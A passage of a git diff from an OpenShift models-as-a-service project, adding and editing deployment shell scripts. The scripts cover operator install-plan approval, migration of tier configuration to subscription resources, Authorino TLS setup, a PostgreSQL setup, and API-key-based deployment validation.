ref not yet on Subscription) + local fallback_ip + fallback_ip=$(kubectl get installplan -n "$namespace" -o json 2>/dev/null | jq -r '.items[] | select((.spec.approved // false) == false) | .metadata.name' 2>/dev/null | head -1) + if [[ -n "$fallback_ip" ]]; then + log_info "Approving pending InstallPlan $fallback_ip (Manual subscription, fallback)" + kubectl patch installplan "$fallback_ip" -n "$namespace" --type=merge -p '{"spec":{"approved":true}}' || true + else + log_warn "No InstallPlan to auto-approve within ${timeout}s; if install stalls, approve the InstallPlan manually" + fi +} + # checksubscriptionexists catalog_namespace catalog_name operator_name # Checks if a subscription exists for the given operator from the specified catalog. # Returns the count of matching subscriptions (0 if none found). @@ -264,7 +304,7 @@ should_install_operator() { return 0 } -# install_olm_operator operator_name namespace catalog_source channel starting_csv operatorgroup_target source_namespace +# install_olm_operator operator_name namespace catalog_source channel starting_csv operatorgroup_target source_namespace install_plan_approval # Generic function to install an OLM operator. # # Arguments: @@ -275,6 +315,8 @@ should_install_operator() { # starting_csv - Starting CSV (optional, can be empty) # operatorgroup_target - Target namespace for OperatorGroup (optional, uses namespace if empty) # source_namespace - Catalog source namespace (optional, defaults to openshift-marketplace) +# install_plan_approval - Automatic or Manual (optional, empty = omit). Manual blocks automatic +# upgrades; this script auto-approves only the first InstallPlan so initial install still completes. 
install_olm_operator() { local operator_name=${1?operator name is required}; shift local namespace=${1?namespace is required}; shift @@ -283,6 +325,7 @@ install_olm_operator() { local starting_csv=${1:-}; shift || true local operatorgroup_target=${1:-}; shift || true local source_namespace=${1:-openshift-marketplace}; shift || true + local install_plan_approval=${1:-}; shift || true log_info "Installing operator: $operator_name in namespace: $namespace" @@ -333,7 +376,11 @@ EOF fi # Create Subscription - log_info "Creating Subscription for $operator_name from $catalog_source (channel: $channel)" + local sub_log="Creating Subscription for $operator_name from $catalog_source (channel: $channel" + [[ -n "$install_plan_approval" ]] && sub_log+=", installPlanApproval: $install_plan_approval" + [[ -n "$starting_csv" ]] && sub_log+=", startingCSV: $starting_csv" + sub_log+=")" + log_info "$sub_log" local subscription_yaml=" apiVersion: operators.coreos.com/v1alpha1 kind: Subscription @@ -347,6 +394,11 @@ spec: sourceNamespace: ${source_namespace} " + if [[ -n "$install_plan_approval" ]]; then + subscription_yaml="${subscription_yaml} installPlanApproval: ${install_plan_approval} +" + fi + if [[ -n "$starting_csv" ]]; then subscription_yaml="${subscription_yaml} startingCSV: ${starting_csv} " @@ -354,6 +406,11 @@ spec: echo "$subscription_yaml" | kubectl apply -f - + if [[ "$install_plan_approval" == "Manual" ]]; then + log_info "Manual Subscription: approving initial InstallPlan so first install can proceed..." + approve_initial_installplan_if_manual "$namespace" "$operator_name" 180 + fi + # Wait for subscription to be installed log_info "Waiting for subscription to install..." 
waitsubscriptioninstalled "$namespace" "$operator_name" diff --git a/scripts/migrate-tier-to-subscription.sh b/scripts/migrate-tier-to-subscription.sh new file mode 100755 index 000000000..5291c00c2 --- /dev/null +++ b/scripts/migrate-tier-to-subscription.sh @@ -0,0 +1,616 @@ +#!/bin/bash + +# Migration script: Convert tier-based configuration to subscription model +# This script generates MaaSModelRef, MaaSAuthPolicy, and MaaSSubscription CRs +# from existing tier-to-group-mapping ConfigMap configuration. + +set -euo pipefail + +# Default values +TIER="" +MODELS="" +AUTH_GROUPS="" +RATE_LIMIT="" +WINDOW="1m" +OUTPUT_DIR="migration-crs" +SUBSCRIPTION_NAMESPACE="models-as-a-service" +MODEL_NAMESPACE="llm" +MAAS_NAMESPACE="opendatahub" +DRY_RUN=false +APPLY=false +VERBOSE=false + +# Colors +RED='\033[0;31m' +GREEN='\033[0;32m' +YELLOW='\033[1;33m' +BLUE='\033[0;34m' +NC='\033[0m' # No Color + +# Helper functions +log_info() { + echo -e "${BLUE}ℹ️ ${NC}$1" +} + +log_success() { + echo -e "${GREEN}✅ ${NC}$1" +} + +log_warn() { + echo -e "${YELLOW}⚠️ ${NC}$1" +} + +log_error() { + echo -e "${RED}❌ ${NC}$1" +} + +log_verbose() { + if [[ "$VERBOSE" == "true" ]]; then + echo -e "${BLUE} ${NC}$1" + fi +} + +# Validate Kubernetes resource name (DNS subdomain format) +# Usage: validate_resource_name [max_length] +validate_resource_name() { + local name="$1" + local field="$2" + local max_length="${3:-253}" # Default to 253 (DNS subdomain), override for stricter limits + + if [[ -z "$name" ]]; then + log_error "$field cannot be empty" + return 1 + fi + + if [[ ${#name} -gt $max_length ]]; then + log_error "$field '$name' exceeds maximum length of $max_length characters (actual: ${#name})" + return 1 + fi + + if [[ ! 
"$name" =~ ^[a-z0-9]([-a-z0-9]*[a-z0-9])?(\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*$ ]]; then + log_error "$field '$name' contains invalid characters" + log_info "Valid format: lowercase alphanumeric, '-', '.'; must start/end with alphanumeric" + return 1 + fi + + return 0 +} + +# Quote string for YAML output (escapes quotes and special chars) +yaml_quote() { + local value="$1" + # Escape backslashes and double quotes + value="${value//\\/\\\\}" + value="${value//\"/\\\"}" + echo "\"$value\"" +} + +# Validate that an option has a value +validate_option_value() { + local option="$1" + local value="${2:-}" + + if [[ -z "$value" ]] || [[ "$value" == --* ]]; then + log_error "Option $option requires a value" + usage + exit 1 + fi +} + +usage() { + cat < Tier name from ConfigMap (required) + --models Comma-separated model names (required) + --groups Comma-separated group names (optional, auto-detected from ConfigMap) + --rate-limit Token rate limit (required) + --window Rate limit window (default: 1m) + --output Output directory for generated CRs (default: migration-crs) + --subscription-ns Subscription namespace (default: models-as-a-service) + --model-ns Model namespace (default: llm) + --maas-ns MaaS namespace (default: opendatahub) + --dry-run Generate files without applying + --apply Apply generated CRs to cluster + --verbose Enable verbose logging + --help Show this help message + +EXAMPLES: + # Generate CRs for premium tier + $0 --tier premium \\ + --models model-a,model-b,model-c \\ + --groups premium-users \\ + --rate-limit 50000 \\ + --output migration-crs/premium/ + + # Generate and apply for free tier + $0 --tier free \\ + --models simulator,qwen3 \\ + --groups system:authenticated \\ + --rate-limit 100 \\ + --apply + + # Extract tier config from ConfigMap and generate CRs + $0 --tier enterprise \\ + --models \$(kubectl get llminferenceservice -n llm -o name | cut -d/ -f2 | tr '\\n' ',') \\ + --groups enterprise-users \\ + --rate-limit 100000 \\ + --dry-run \\ + 
--verbose + +EOF +} + +# Parse command line arguments +while [[ $# -gt 0 ]]; do + case $1 in + --tier) + validate_option_value "$1" "${2:-}" + TIER="$2" + shift 2 + ;; + --models) + validate_option_value "$1" "${2:-}" + MODELS="$2" + shift 2 + ;; + --groups) + validate_option_value "$1" "${2:-}" + AUTH_GROUPS="$2" + shift 2 + ;; + --rate-limit) + validate_option_value "$1" "${2:-}" + RATE_LIMIT="$2" + shift 2 + ;; + --window) + validate_option_value "$1" "${2:-}" + WINDOW="$2" + shift 2 + ;; + --output) + validate_option_value "$1" "${2:-}" + OUTPUT_DIR="$2" + shift 2 + ;; + --subscription-ns) + validate_option_value "$1" "${2:-}" + SUBSCRIPTION_NAMESPACE="$2" + shift 2 + ;; + --model-ns) + validate_option_value "$1" "${2:-}" + MODEL_NAMESPACE="$2" + shift 2 + ;; + --maas-ns) + validate_option_value "$1" "${2:-}" + MAAS_NAMESPACE="$2" + shift 2 + ;; + --dry-run) + DRY_RUN=true + shift + ;; + --apply) + APPLY=true + shift + ;; + --verbose) + VERBOSE=true + shift + ;; + --help) + usage + exit 0 + ;; + *) + log_error "Unknown option: $1" + usage + exit 1 + ;; + esac +done + +# Validate required parameters +if [[ -z "$TIER" ]]; then + log_error "Missing required parameter: --tier" + usage + exit 1 +fi + +if [[ -z "$MODELS" ]]; then + log_error "Missing required parameter: --models" + usage + exit 1 +fi + +if [[ -z "$RATE_LIMIT" ]]; then + log_error "Missing required parameter: --rate-limit" + usage + exit 1 +fi + +# Validate rate limit is a positive integer +if ! [[ "$RATE_LIMIT" =~ ^[0-9]+$ ]] || [[ "$RATE_LIMIT" -eq 0 ]]; then + log_error "Rate limit must be a positive integer, got: '$RATE_LIMIT'" + exit 1 +fi + +# Validate window format (e.g., 1m, 60s, 1h) +if ! [[ "$WINDOW" =~ ^[0-9]+(s|m|h|d)$ ]]; then + log_error "Window must be a valid duration (e.g., 1m, 60s, 1h), got: '$WINDOW'" + exit 1 +fi + +# Validate tier name (used in resource names like ${TIER}-models-access, max 63 chars) +if ! 
validate_resource_name "$TIER" "Tier name" 63; then + log_info "Tier name is used in generated CR names and must not exceed 63 characters" + exit 1 +fi + +# Extract groups from ConfigMap if not provided +if [[ -z "$AUTH_GROUPS" ]]; then + log_info "Attempting to extract groups for tier '$TIER' from ConfigMap..." + + if ! command -v yq &> /dev/null; then + log_error "yq is required for ConfigMap extraction but not found" + log_info "Install yq (https://github.com/mikefarah/yq) or specify groups manually with --groups" + exit 1 + fi + + if kubectl get configmap tier-to-group-mapping -n maas-api >/dev/null 2>&1; then + AUTH_GROUPS=$(kubectl get configmap tier-to-group-mapping -n maas-api -o yaml | \ + yq eval '.data[]' - | \ + TIER="$TIER" yq eval '[.[] | select(.name == env(TIER)) | .groups[]] | join(",")' -) + + if [[ -n "$AUTH_GROUPS" ]]; then + log_success "Extracted groups: $AUTH_GROUPS" + else + log_error "Could not extract groups for tier '$TIER' from ConfigMap" + log_info "Please specify groups manually with --groups" + exit 1 + fi + else + log_error "ConfigMap tier-to-group-mapping not found in maas-api namespace" + log_info "Please specify groups manually with --groups" + exit 1 + fi +fi + +# Create output directory and clean any existing files to prevent stale YAML +if [[ "$DRY_RUN" == "false" ]]; then + if [[ -d "$OUTPUT_DIR" ]]; then + # Directory exists - check if it has files + if [[ -n "$(find "$OUTPUT_DIR" -maxdepth 1 -name '*.yaml' -print -quit)" ]]; then + log_warn "Output directory '$OUTPUT_DIR' contains existing YAML files" + log_info "Cleaning directory to prevent applying stale manifests..." 
+ rm -f "$OUTPUT_DIR"/*.yaml + log_success "Cleaned existing YAML files from: $OUTPUT_DIR" + fi + else + # Directory doesn't exist - create it + mkdir -p "$OUTPUT_DIR" + log_success "Created output directory: $OUTPUT_DIR" + fi +fi + +# Convert comma-separated lists to arrays +IFS=',' read -ra MODEL_ARRAY <<< "$MODELS" +IFS=',' read -ra GROUP_ARRAY <<< "$AUTH_GROUPS" + +# Validate model names (must be valid MaaSModelRef names, max 63 chars) +for model in "${MODEL_ARRAY[@]}"; do + model=$(echo "$model" | xargs) # trim whitespace + if ! validate_resource_name "$model" "Model name" 63; then + log_error "Invalid model name in list: '$model'" + log_info "Model names are used as MaaSModelRef names and must not exceed 63 characters" + exit 1 + fi +done + +# Validate group names (groups can contain ':' for system groups like 'system:authenticated') +for group in "${GROUP_ARRAY[@]}"; do + group=$(echo "$group" | xargs) # trim whitespace + if [[ -z "$group" ]]; then + log_error "Group name cannot be empty" + exit 1 + fi + # Groups have more permissive naming (allow colons for system:* groups) + if [[ ${#group} -gt 253 ]]; then + log_error "Group name '$group' exceeds maximum length of 253 characters" + exit 1 + fi +done + +# Validate namespace names used in modelRefs (CRD limit: 63 characters) +if ! validate_resource_name "$MODEL_NAMESPACE" "Model namespace" 63; then + log_error "Model namespace is used in modelRefs[].namespace and must not exceed 63 characters" + exit 1 +fi + +# Validate subscription namespace (used as metadata.namespace for MaaSAuthPolicy/MaaSSubscription) +if ! 
validate_resource_name "$SUBSCRIPTION_NAMESPACE" "Subscription namespace" 63; then + log_error "Subscription namespace is used as metadata.namespace for generated CRs and must not exceed 63 characters" + exit 1 +fi + +log_info "Migration Configuration:" +log_verbose " Tier: $TIER" +log_verbose " Models: ${#MODEL_ARRAY[@]} (${MODELS})" +log_verbose " Groups: ${#GROUP_ARRAY[@]} (${AUTH_GROUPS})" +log_verbose " Rate Limit: $RATE_LIMIT tokens per $WINDOW" +log_verbose " Output: $OUTPUT_DIR" +log_verbose " Namespaces: MaaS=$MAAS_NAMESPACE, Subscription=$SUBSCRIPTION_NAMESPACE, Model=$MODEL_NAMESPACE" +log_verbose " Mode: $([ "$DRY_RUN" == "true" ] && echo "DRY-RUN" || echo "GENERATE")$([ "$APPLY" == "true" ] && echo " + APPLY" || echo "")" + +# Generate MaaSModelRef for each model +log_info "Generating MaaSModelRef CRs..." +for model in "${MODEL_ARRAY[@]}"; do + model=$(echo "$model" | xargs) # trim whitespace + + MAASMODELREF_FILE="$OUTPUT_DIR/maasmodelref-${model}.yaml" + + if [[ "$DRY_RUN" == "false" ]]; then + cat > "$MAASMODELREF_FILE" < "$AUTHPOLICY_FILE" <> "$AUTHPOLICY_FILE" <> "$AUTHPOLICY_FILE" <> "$AUTHPOLICY_FILE" + done + + cat >> "$AUTHPOLICY_FILE" < "$SUBSCRIPTION_FILE" <> "$SUBSCRIPTION_FILE" + done + + cat >> "$SUBSCRIPTION_FILE" <> "$SUBSCRIPTION_FILE" < /dev/null; then + log_error "kubectl not found. Cannot apply CRs." + exit 1 + fi + + # Check if subscription namespace exists + if ! kubectl get namespace "$SUBSCRIPTION_NAMESPACE" >/dev/null 2>&1; then + log_warn "Subscription namespace '$SUBSCRIPTION_NAMESPACE' does not exist" + + # Auto-create in non-interactive mode (CI or non-TTY) + if [[ -n "${CI:-}" ]] || [[ ! -t 0 ]]; then + log_info "Non-interactive mode detected, automatically creating namespace" + kubectl create namespace "$SUBSCRIPTION_NAMESPACE" + log_success "Created namespace: $SUBSCRIPTION_NAMESPACE" + else + # Interactive mode: prompt user + read -p "Create namespace? 
(y/N) " -n 1 -r + echo + if [[ $REPLY =~ ^[Yy]$ ]]; then + kubectl create namespace "$SUBSCRIPTION_NAMESPACE" + log_success "Created namespace: $SUBSCRIPTION_NAMESPACE" + else + log_error "Cannot proceed without subscription namespace" + exit 1 + fi + fi + fi + + # Apply CRs (only files generated in this run - directory was cleaned earlier) + log_verbose "Applying YAML files from $OUTPUT_DIR:" + if [[ "$VERBOSE" == "true" ]]; then + ls -1 "$OUTPUT_DIR"/*.yaml 2>/dev/null | sed 's/^/ /' + fi + kubectl apply -f "$OUTPUT_DIR/" + + echo "" + log_success "CRs applied successfully!" + echo "" + + # Validate + log_info "Validating deployment..." + sleep 2 + + # Check MaaSModelRef status + log_info "Checking MaaSModelRef status..." + for model in "${MODEL_ARRAY[@]}"; do + model=$(echo "$model" | xargs) + PHASE=$(kubectl get maasmodelref "$model" -n "$MODEL_NAMESPACE" -o jsonpath='{.status.phase}' 2>/dev/null || echo "NotFound") + if [[ "$PHASE" == "Ready" ]]; then + log_success " $model: Ready" + elif [[ "$PHASE" == "Pending" ]]; then + log_warn " $model: Pending (may need time to reconcile)" + elif [[ "$PHASE" == "NotFound" ]]; then + log_error " $model: Not found" + else + log_warn " $model: $PHASE" + fi + done + + # Check if AuthPolicy and TokenRateLimitPolicy were created + echo "" + log_info "Checking generated Kuadrant policies..." + sleep 2 + + AUTHPOLICY_COUNT=$(kubectl get authpolicy -n "$MODEL_NAMESPACE" -l app.kubernetes.io/managed-by=maas-controller,app.kubernetes.io/part-of=maas-auth-policy 2>/dev/null | wc -l | tr -d ' ') + # Subtract 1 for header line + AUTHPOLICY_COUNT=$((AUTHPOLICY_COUNT > 0 ? AUTHPOLICY_COUNT - 1 : 0)) + + TRLP_COUNT=$(kubectl get tokenratelimitpolicy -n "$MODEL_NAMESPACE" -l app.kubernetes.io/managed-by=maas-controller,app.kubernetes.io/part-of=maas-subscription 2>/dev/null | wc -l | tr -d ' ') + # Subtract 1 for header line + TRLP_COUNT=$((TRLP_COUNT > 0 ? 
TRLP_COUNT - 1 : 0)) + + log_verbose " AuthPolicies created: $AUTHPOLICY_COUNT (expected: ${#MODEL_ARRAY[@]})" + log_verbose " TokenRateLimitPolicies created: $TRLP_COUNT (expected: ${#MODEL_ARRAY[@]})" + + if [[ "$AUTHPOLICY_COUNT" -eq "${#MODEL_ARRAY[@]}" ]] && [[ "$TRLP_COUNT" -eq "${#MODEL_ARRAY[@]}" ]]; then + log_success "All policies created successfully!" + else + log_warn "Not all policies created yet. Controller may still be reconciling." + log_info "Check maas-controller logs: kubectl logs -n $MAAS_NAMESPACE -l app=maas-controller" + fi + + echo "" + log_info "Next steps:" + log_verbose " 1. Test model access with users in tier '$TIER' groups" + log_verbose " 2. Validate rate limiting is working as expected" + log_verbose " 3. Once validated, remove tier annotations from models" + log_verbose " 4. Remove old gateway-auth-policy and tier-based TokenRateLimitPolicy" + echo "" + +else + log_info "Next steps:" + log_verbose " 1. Review generated CRs in: $OUTPUT_DIR" + log_verbose " 2. Apply to cluster: kubectl apply -f $OUTPUT_DIR/" + log_verbose " 3. Or run with --apply flag to apply automatically" + echo "" +fi + +log_success "Migration script completed!" diff --git a/deployment/overlays/tls-backend/configure-authorino-tls.sh b/scripts/setup-authorino-tls.sh similarity index 51% rename from deployment/overlays/tls-backend/configure-authorino-tls.sh rename to scripts/setup-authorino-tls.sh index fd1f64baa..368787785 100755 --- a/deployment/overlays/tls-backend/configure-authorino-tls.sh +++ b/scripts/setup-authorino-tls.sh @@ -1,9 +1,28 @@ #!/bin/bash -# Configure Authorino for TLS communication with maas-api -# This script patches operator-managed Authorino resources that can't be modified via Kustomize +# +# Configure Authorino for TLS communication with maas-api. +# +# When maas-api serves HTTPS (TLS backend), Authorino must: +# 1. Enable TLS on its listener so it accepts HTTPS auth requests +# 2. 
Trust the OpenShift service CA when making outbound requests to maas-api +# (e.g., API key validation at https://maas-api...:8443/internal/v1/api-keys/validate) +# +# This script patches operator-managed Authorino resources that cannot be +# modified via Kustomize. It is run automatically by deploy.sh when +# --enable-tls-backend is set (default). # # Prerequisites: -# - Authorino operator installed in kuadrant-system namespace +# - Authorino operator installed (Kuadrant or RHCL) +# - OpenShift cluster (uses service-ca for certificate provisioning) +# +# Environment variables: +# AUTHORINO_NAMESPACE Authorino namespace (default: kuadrant-system) +# Use rh-connectivity-link for RHCL +# +# Usage: +# ./scripts/setup-authorino-tls.sh +# AUTHORINO_NAMESPACE=rh-connectivity-link ./scripts/setup-authorino-tls.sh +# set -euo pipefail @@ -32,7 +51,6 @@ kubectl patch authorino authorino -n "$NAMESPACE" --type=merge --patch ' } }' - # Note: The Authorino CR doesn't support envVars, so we patch the deployment directly echo "🌍 Adding environment variables to Authorino deployment..." kubectl -n "$NAMESPACE" set env deployment/authorino \ @@ -40,3 +58,7 @@ kubectl -n "$NAMESPACE" set env deployment/authorino \ REQUESTS_CA_BUNDLE=/etc/ssl/certs/openshift-service-ca/service-ca-bundle.crt echo "✅ Authorino TLS configuration complete" +echo "" +echo " Restart maas-api and authorino deployments to pick up TLS configuration:" +echo " kubectl rollout restart deployment/maas-api -n " +echo " kubectl rollout restart deployment/authorino -n $NAMESPACE" diff --git a/scripts/setup-database.sh b/scripts/setup-database.sh new file mode 100755 index 000000000..88d111ed5 --- /dev/null +++ b/scripts/setup-database.sh @@ -0,0 +1,170 @@ +#!/bin/bash +# +# Deploy PostgreSQL for MaaS API key storage. +# +# Creates a PostgreSQL Deployment, Service, and the maas-db-config Secret +# containing DB_CONNECTION_URL. 
This is a POC-grade setup with ephemeral +# storage; for production use AWS RDS, Crunchy Operator, or Azure Database. +# +# Namespace selection: +# - Use NAMESPACE environment variable if set +# - Default: opendatahub (ODH) or redhat-ods-applications (RHOAI) +# +# Environment variables: +# NAMESPACE Target namespace (default: opendatahub) +# POSTGRES_USER Database user (default: maas) +# POSTGRES_DB Database name (default: maas) +# POSTGRES_PASSWORD Database password (default: auto-generated) +# +# Usage: +# ./scripts/setup-database.sh +# NAMESPACE=redhat-ods-applications ./scripts/setup-database.sh +# +# Docker alternative: Replace 'kubectl' with 'oc' if using OpenShift. +# + +set -euo pipefail + +# Default namespace for ODH; use redhat-ods-applications for RHOAI +: "${NAMESPACE:=opendatahub}" + +# Ensure namespace exists +if ! kubectl get namespace "$NAMESPACE" >/dev/null 2>&1; then + echo "📦 Creating namespace '$NAMESPACE'..." + kubectl create namespace "$NAMESPACE" +fi + +echo "🔧 Deploying PostgreSQL for API key storage in namespace '$NAMESPACE'..." + +# Check if PostgreSQL already exists +if kubectl get deployment postgres -n "$NAMESPACE" &>/dev/null; then + echo " PostgreSQL already deployed in namespace $NAMESPACE" + echo " Service: postgres:5432" + echo " Secret: maas-db-config (contains DB_CONNECTION_URL)" + exit 0 +fi + +# PostgreSQL configuration (POC-grade, not for production) +POSTGRES_USER="${POSTGRES_USER:-maas}" +POSTGRES_DB="${POSTGRES_DB:-maas}" + +# Generate random password if not provided +if [[ -z "${POSTGRES_PASSWORD:-}" ]]; then + POSTGRES_PASSWORD="$(openssl rand -base64 32 | tr -d '/+=' | cut -c1-32)" + echo " Generated random PostgreSQL password (stored in secret postgres-creds)" +fi + +echo " Creating PostgreSQL deployment..." 
+echo " ⚠️ Using POC configuration (ephemeral storage)" +echo "" + +# Deploy PostgreSQL resources +kubectl apply -n "$NAMESPACE" -f - <&2 + exit 1 +fi + +echo "" +echo "✅ PostgreSQL deployed successfully" +echo " Database: $POSTGRES_DB" +echo " User: $POSTGRES_USER" +echo " Secret: maas-db-config (contains DB_CONNECTION_URL)" +echo "" +echo " ⚠️ For production, use AWS RDS, Crunchy Operator, or Azure Database" +echo " Note: Schema migrations run automatically when maas-api starts" diff --git a/scripts/validate-deployment.sh b/scripts/validate-deployment.sh index 781c9608a..1d5846853 100755 --- a/scripts/validate-deployment.sh +++ b/scripts/validate-deployment.sh @@ -414,18 +414,79 @@ else print_info "Using gateway endpoint: $HOST" # Get authentication token for API tests - # Use pre-existing token from CI/test environment, or fall back to oc whoami -t + # First obtain the OC identity token, then create a MaaS API key for subsequent calls print_check "Authentication token" - if command -v oc &> /dev/null; then - TOKEN="${TOKEN:-${ADMIN_OC_TOKEN:-$(oc whoami -t 2>/dev/null || echo "")}}" - if [ -n "$TOKEN" ]; then - print_success "Authentication token available" + TOKEN="" + API_KEY_ID="" + OC_TOKEN="${ADMIN_OC_TOKEN:-}" + if [ -z "$OC_TOKEN" ] && command -v oc &> /dev/null; then + OC_TOKEN="$(oc whoami -t 2>/dev/null || echo "")" + fi + + if [ -n "$OC_TOKEN" ]; then + print_success "OpenShift identity token available" + elif command -v oc &> /dev/null; then + print_warning "Cannot get OpenShift token" "Not logged into oc CLI" "Run: oc login" + else + print_warning "Cannot get OpenShift token" "Neither ADMIN_OC_TOKEN nor oc CLI is available" "Set ADMIN_OC_TOKEN or install oc CLI" + fi + + # Create a MaaS API key using the OC token + if [ -n "$OC_TOKEN" ]; then + print_check "MaaS API key creation" + API_KEY_NAME="validate-test-$(date +%s)" + API_KEY_RESPONSE=$(curl -sSk --connect-timeout 10 --max-time 30 \ + -H "Authorization: Bearer $OC_TOKEN" \ + -H "Content-Type: 
application/json" \ + -X POST \ + -d "{\"expiresIn\": \"1h\", \"name\": \"$API_KEY_NAME\"}" \ + -w "\n%{http_code}" \ + "${HOST}/maas-api/v1/api-keys" 2>/dev/null || echo "") + API_KEY_HTTP_CODE=$(echo "$API_KEY_RESPONSE" | tail -n1) + API_KEY_BODY=$(echo "$API_KEY_RESPONSE" | sed '$d') + + if [ "$API_KEY_HTTP_CODE" = "201" ]; then + TOKEN=$(echo "$API_KEY_BODY" | jq -r '.key // empty' 2>/dev/null) + API_KEY_ID=$(echo "$API_KEY_BODY" | jq -r '.id // empty' 2>/dev/null) + if [ -n "$TOKEN" ] && [ "$TOKEN" != "null" ] && [ -n "$API_KEY_ID" ] && [ "$API_KEY_ID" != "null" ]; then + print_success "MaaS API key created (name: $API_KEY_NAME)" + # Set up cleanup trap to delete the API key on exit + cleanup_api_key() { + if [ -n "${API_KEY_ID:-}" ] && [ "${API_KEY_ID}" != "null" ]; then + curl -sSk -o /dev/null \ + -H "Authorization: Bearer $OC_TOKEN" \ + -X DELETE \ + "${HOST}/maas-api/v1/api-keys/${API_KEY_ID}" 2>/dev/null || true + fi + } + cleanup_and_exit() { + local status="$1" + trap - EXIT + cleanup_api_key + exit "$status" + } + trap cleanup_api_key EXIT + trap 'cleanup_and_exit 130' INT + trap 'cleanup_and_exit 143' TERM + else + print_fail "Failed to parse API key from response" \ + "Response omitted because it may contain the plaintext API key" + # Clean up the API key if we got an ID but failed to parse the key + if [ -n "$API_KEY_ID" ]; then + curl -sSk -o /dev/null \ + -H "Authorization: Bearer $OC_TOKEN" \ + -X DELETE \ + "${HOST}/maas-api/v1/api-keys/${API_KEY_ID}" 2>/dev/null || true + fi + TOKEN="" + API_KEY_ID="" + fi else - print_warning "Cannot get OpenShift token" "Not logged into oc CLI" "Run: oc login" + print_fail "Failed to create MaaS API key (HTTP $API_KEY_HTTP_CODE)" \ + "Response: $(echo "$API_KEY_BODY" | head -c 200)" \ + "Check MaaS API key endpoint: ${HOST}/maas-api/v1/api-keys" + TOKEN="" fi - else - print_warning "oc CLI not found" "Cannot test authentication" "Install oc CLI or use kubectl with token" - TOKEN="" fi # Test models endpoint 
diff --git a/scripts/validate-tool-calling.sh b/scripts/validate-tool-calling.sh deleted file mode 100755 index 720c184da..000000000 --- a/scripts/validate-tool-calling.sh +++ /dev/null @@ -1,403 +0,0 @@ -#!/bin/bash - -# MaaS Tool Calling Validation Script -# This script validates that tool calling functionality works with vLLM models -# -# Usage: ./validate-tool-calling.sh [MODEL_NAME] -# MODEL_NAME: Optional. If provided, the script will validate using this specific model - -# Note: We don't use 'set -e' because we want to continue validation even if some checks fail - -# Parse command line arguments -REQUESTED_MODEL="" - -# Show help if requested -if [ "$1" = "--help" ] || [ "$1" = "-h" ]; then - echo "MaaS Tool Calling Validation Script" - echo "" - echo "Usage: $0 [MODEL_NAME]" - echo "" - echo "This script validates that tool calling functionality works with vLLM models." - echo "It performs a single test call to the endpoint with a basic tool definition." - echo "" - echo "Arguments:" - echo " MODEL_NAME Optional. Name of a specific model to use for validation." - echo " If not provided, the first available model will be used." 
- echo "" - echo "Examples:" - echo " # Basic tool calling validation" - echo " $0 # Validate using first available model" - echo " $0 single-node-no-scheduler-nvidia-gpu # Validate using specific model" - echo "" - echo "Exit Codes:" - echo " 0 Tool calling validation passed" - echo " 1 Tool calling validation failed" - echo "" - exit 0 -fi - -# Parse arguments -if [ $# -gt 0 ]; then - REQUESTED_MODEL="$1" -fi - -# Color codes for output -RED='\033[0;31m' -GREEN='\033[0;32m' -YELLOW='\033[1;33m' -BLUE='\033[0;34m' -NC='\033[0m' # No Color - -# Helper functions for colored output -print_check() { - echo -e "${BLUE}✓${NC} $1" -} - -print_success() { - echo -e "${GREEN}✓${NC} $1" -} - -print_fail() { - echo -e "${RED}✗${NC} $1" - if [ -n "$2" ]; then - echo -e " ${YELLOW}→${NC} $2" - fi - if [ -n "$3" ]; then - echo -e " ${YELLOW}→${NC} $3" - fi -} - -print_warning() { - echo -e "${YELLOW}⚠${NC} $1" - if [ -n "$2" ]; then - echo -e " ${YELLOW}→${NC} $2" - fi -} - -print_info() { - echo -e "${BLUE}ℹ${NC} $1" -} - -# Get authentication token -get_auth_token() { - print_check "Getting authentication token" - - if [ -z "$HOST" ]; then - print_fail "Host not set - cannot get authentication token" - return 1 - fi - - ENDPOINT="${HOST}/maas-api/v1/tokens" - print_info "Testing: curl -sSk -X POST $ENDPOINT -H 'Authorization: Bearer \$(oc whoami -t)' -H 'Content-Type: application/json' -d '{\"expiration\": \"10m\"}'" - - if command -v oc &> /dev/null; then - OC_TOKEN=$(oc whoami -t 2>/dev/null || echo "") - if [ -n "$OC_TOKEN" ]; then - TOKEN_RESPONSE=$(curl -sSk --connect-timeout 10 --max-time 30 -w "\n%{http_code}" \ - -H "Authorization: Bearer ${OC_TOKEN}" \ - -H "Content-Type: application/json" \ - -X POST \ - -d '{"expiration": "10m"}' \ - "${ENDPOINT}" 2>/dev/null || echo "") - - HTTP_CODE=$(echo "$TOKEN_RESPONSE" | tail -n1) - RESPONSE_BODY=$(echo "$TOKEN_RESPONSE" | sed '$d') - - # Handle timeout/connection failure - if [ -z "$HTTP_CODE" ] || [ "$HTTP_CODE" = "000" ]; 
then - print_fail "Connection timeout or failed to reach endpoint" \ - "The endpoint is not reachable. This is likely because:" \ - "1) The endpoint is behind a VPN or firewall, 2) DNS resolution failed, 3) Gateway/Route not properly configured" - return 1 - elif [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "201" ]; then - TOKEN=$(echo "$RESPONSE_BODY" | jq -r '.token' 2>/dev/null || echo "") - if [ -n "$TOKEN" ] && [ "$TOKEN" != "null" ]; then - print_success "Authentication successful (HTTP $HTTP_CODE)" - return 0 - else - print_fail "Authentication response invalid" "Received HTTP $HTTP_CODE but no token in response" "Check MaaS API logs: kubectl logs -n maas-api -l app=maas-api" - return 1 - fi - elif [ "$HTTP_CODE" = "404" ]; then - print_fail "Endpoint not found (HTTP 404)" \ - "Traffic is reaching the Gateway/pods but the path is incorrect" \ - "Check HTTPRoute configuration: kubectl describe httproute maas-api-route -n maas-api" - return 1 - elif [ "$HTTP_CODE" = "502" ] || [ "$HTTP_CODE" = "503" ]; then - print_fail "Gateway/Service error (HTTP $HTTP_CODE)" \ - "The Gateway is not able to reach the backend service" \ - "Check: 1) MaaS API pods are running: kubectl get pods -n maas-api, 2) Service exists: kubectl get svc maas-api -n maas-api" - return 1 - else - print_fail "Authentication failed (HTTP $HTTP_CODE)" "Response: $(echo $RESPONSE_BODY | head -c 100)" "Check AuthPolicy and MaaS API service" - return 1 - fi - else - print_fail "Cannot get OpenShift token" "Not logged into oc CLI" "Run: oc login" - return 1 - fi - else - print_fail "oc CLI not found" "Cannot test authentication" "Install oc CLI or use kubectl with token" - return 1 - fi -} - -# Get the MaaS API host -get_maas_host() { - print_check "Getting MaaS API host" - - # Get cluster domain and construct the MaaS gateway hostname - CLUSTER_DOMAIN=$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}' 2>/dev/null || echo "") - if [ -n "$CLUSTER_DOMAIN" ]; then - 
